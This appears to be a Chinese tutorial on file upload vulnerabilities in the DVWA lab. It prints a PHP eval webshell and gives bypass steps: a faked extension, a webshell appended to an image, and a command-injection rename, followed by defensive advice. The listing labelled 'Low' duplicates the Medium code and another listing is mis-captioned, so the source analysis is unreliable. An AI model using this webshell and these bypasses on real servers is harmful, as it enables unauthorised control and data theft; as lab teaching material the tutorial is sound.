Web安全系列：文件上传漏洞从入门到精通

一、文件上传漏洞简介

文件上传漏洞（File Upload Vulnerability）是一种常见的 Web 应用程序漏洞，通常存在于需要用户上传文件的应用程序中，如论坛、电子商务网站、博客、社交网站等。

攻击者可以通过该漏洞上传恶意文件到服务器，从而执行各种攻击操作，如执行命令、窃取敏感数据、植入后门等。

文件上传漏洞通常发生的原因多是服务器未正确验证上传文件类型、大小、路径等参数等，攻击者可以利用这些漏洞绕过服务器的限制，上传恶意文件或脚本到服务器。攻击者通过构造文件名或文件内容来绕过服务器的检查。

本文继续以DVWA（Damn Vulnerable Web Application）进行文件上传漏洞的讲解。

在DVWA中的文件上传漏洞是通过一个文件上传页面实现的。攻击者可以在该页面上选择要上传的文件，并在提交表单时将文件类型伪装为其他允许的文件类型，如.jpg、.png等。这样，服务器就会误认为上传的是图片文件，而没有对文件内容进行进一步的验证和过滤。通过这种方式，攻击者可以将恶意脚本文件上传到服务器上，并在上传成功后访问该文件来执行恶意代码。例如，攻击者可以将一个包含后门功能的PHP脚本上传到服务器上，并通过执行该脚本来获取管理员权限或窃取服务器中的敏感数据。

图1-1 网页概念图

二、文件上传Low Level漏洞原理

（1）在DVWA low security 中，可以直接上传webshell.php，对服务器进行控制，webshell.php代码如下，读者在webshell.php上传后可自行用蚁剑连接。

<?php @eval($_POST['shell']);?>

图2-1 蚁剑连接webshell

（2）这里点击View Source直接对上传源码进行分析，文件上传的php源代码如代码1-1所示。

图2-2 View Source Button组件

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

代码 2-1 Low Level php源代码

阅读PHP源代码可以发现：

• 在第5行代码中定义了文件上传的目标路径，即在DVWA的Web根目录下的hackable/uploads/目录中。

• 在第6行代码中获取了要上传的文件名，即上传表单中的文件名。

• 在第19-20行代码中，将上传文件移动到目标路径，如果移动失败，则输出提示信息“Your image was not uploaded.”，否则输出上传成功的提示信息。

总结来说就是：

代码并没有对上传的文件类型、大小、路径等参数进行严格的验证和过滤，这可能会导致文件上传漏洞的产生。 攻击者可以在上传表单中伪造文件类型、修改上传路径等方式来上传恶意文件到服务器上，从而执行各种攻击操作，如执行命令、窃取敏感数据、植入后门等。

三、文件上传Medium Level漏洞原理

(1)继续阅读PHP源代码可以发现：

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

代码 3-1 Medium level php源代码

• 在第9-11行代码中，获取了上传文件的一些基本信息，包括文件名、文件类型和文件大小。

• 在第14-15行代码中，对上传文件进行了类型和大小的验证。其中，对文件类型的验证要求文件必须为JPEG或PNG格式的图片；对文件大小的验证要求文件大小必须小于100KB。

• 在第14-29行代码中，如果上传的文件类型和大小满足要求，则将文件移动到目标路径，并输出上传成功的提示信息；如果上传的文件类型和大小不满足要求，则输出提示信息，告知用户无法上传该文件类型。

在上面分析的基础上，可以得出结论。设计一个绕过上传类型(png、jpeg)、大小的文件，上传到服务器，就可以实现木马的上传，方法如下。

（2）将webshell.php 改名为webshell.php.jpg。

（3）点击文件上传，进行抓包分析，然后将webshell.php.jpg更改为webshell.php，如此后端在取文件名字进行保存的时候，便保存为了webshell.php，达到了木马上传的效果。

图3-1 修改文件后缀名

图3-2 蚁剑连接上传的webshell

四、文件上传High Level漏洞原理

(1) 阅读PHP High level源代码可以发现：

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

代码 3-1 Medium level php源代码

阅读源代码可以发现：

• 在第10-13行代码中，获取了上传文件的一些基本信息，包括文件名、文件扩展名、文件大小和文件临时路径。

• 在第16-18行代码中，对上传文件进行了类型、大小和内容的验证。其中，对文件类型的验证要求文件必须为JPEG或PNG格式的图片；对文件大小的验证要求文件大小必须小于100KB；对文件内容的验证要求文件内容必须是合法的图片格式。这些验证措施可以有效防止上传恶意文件或脚本文件到服务器上。

• 在第21-27行代码中，如果上传的文件类型、大小和内容都满足要求，则将文件移动到目标路径，并输出上传成功的提示信息；如果上传的文件类型、大小和内容不满足要求，则输出提示信息，告知用户无法上传该文件类型。

总体来说，通过这段代码的改进，可以有效防止文件上传漏洞的发生，从而保护服务器的安全性。但是，需要注意的是，这段代码仍然存在一些问题，例如上传文件的路径没有进行安全验证，可能会导致目录穿越漏洞的发生。

(2)绕过High level文件长传限制方法如下：

• 准备一个正常的 JPG 图片，例如 cat.png。

图4-1 cat.png图片

• 创建一个 PHP Web Shell 文件，例如 webshell.php，内容如下：

<?php @eval($_POST['shell']);?>

• 使用010editor编辑器打开 cat.png，将上述 PHP 代码复制到文件末尾，并保存文件。

图4-2 cat.jpg加上webshell木马

（3）将 cat.png 重命名 webshell.png，上传此文件到目标 Web 服务器。此时上传的 webshell.png文件无法直接在 URL 上执行，因为它以 png 扩展名上传。

（4）将此文件重命名为 PHP 文件，这个时候需要利用DVWA漏洞命令注入选项，利用漏洞复制webshell.png 并将其重命名为 webshell.php 文件（DVWA漏洞命令注入可以阅读我写的命令注入篇章）。

（5）用蚁剑连接

图4-3 蚁剑连接上传的webshell

五、文件上传安全防护方法

文件上传漏洞可能会导致恶意文件被上传到服务器上，攻击者可以通过这些文件来执行攻击，例如控制服务器或窃取敏感数据。因此，对于任何需要处理文件上传的应用程序来说，实施文件上传安全措施至关重要。下面介绍几种防御措施以避免文件上传漏洞。

1. 文件类型和大小限制：应该对文件的类型和大小进行限制，以防止上传恶意文件和过大的文件，从而防止应用程序遭受拒绝服务攻击。

2. 检测上传文件的内容：可以检测上传文件的内容，以防止上传恶意代码。可以使用一些工具来扫描上传的文件，以确保它们不包含恶意代码。

3. 限制上传文件的目录和文件名：可以限制上传文件的目录和文件名，以防止攻击者上传恶意文件，并且防止目录遍历攻击。

4. 实现访问控制：可以实现访问控制，以限制哪些用户有权上传文件。可以强制实施强密码策略，例如要求用户使用复杂密码，并定期更改密码等。

5. 使用加密协议：使用SSL/TLS协议可以加密数据传输，确保上传的数据不会被截取或窃取。建议使用HTTPS来保护数据在传输过程中的安全。

6. 实现文件上传白名单：实施文件上传白名单可以限制上传文件的来源，只允许从信任的来源上传文件。

7. 防火墙和安全软件：使用防火墙和安全软件，可以检测并防止未经授权的访问和攻击，保护服务器免受恶意软件和网络攻击。

图5-1 文件上传安全防护

六、附录

环境及工具配置

（1）文章中所使用的工具是DVWA源代码和WNMP环境，其中DVWA是一个专门用于漏洞测试的Web应用程序。

（2）为了测试DVWA中的登录安全认证漏洞，需要执行以下步骤：

• 安装WNMP环境并启动服务器。

• 下载和安装DVWA，将其部署到WNMP服务器上。

• 启动DVWA应用程序，通过Web浏览器访问DVWA网站。

• 在DVWA中寻找和测试文件上传安全漏洞。

Web安全初学者如果自行搭建本文的测试环境及编写代码存在困难，也可以通过以下github获取相关源码及测试环境。

本文所测试用到的相关源码及测试环境:

Web-PenTest/README.md at main · MasterTaiBai/Web-PenTest · GitHub

成为一名合格的Web安全专业人员需要长时间的学习和实践。只有通过持续的努力，掌握Web安全知识和技能，才能真正成为一个专业的白帽子。

在此祝愿安全爱好者及从业人员都能够取得成功，实现自己的梦想，为网络安全贡献自己的力量！

图6-1 安全黑客